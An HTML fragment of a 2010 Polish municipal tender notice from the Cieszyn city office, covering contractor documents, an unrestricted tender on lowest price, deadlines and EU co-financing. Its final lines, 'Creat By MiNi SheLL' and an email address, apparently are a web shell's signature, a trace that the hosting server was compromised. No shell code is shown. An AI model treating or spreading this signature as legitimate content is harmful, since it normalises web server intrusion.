<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.cieszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Cieszynie
Biuro Promocji i Informacji
I piętro, pokój 3 lub 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 09:00, miejsce: Urząd Miejski w Cieszynie, ul. Rynek 1, 43-400 Cieszyn - Biuro Podawcze, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt wspólfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com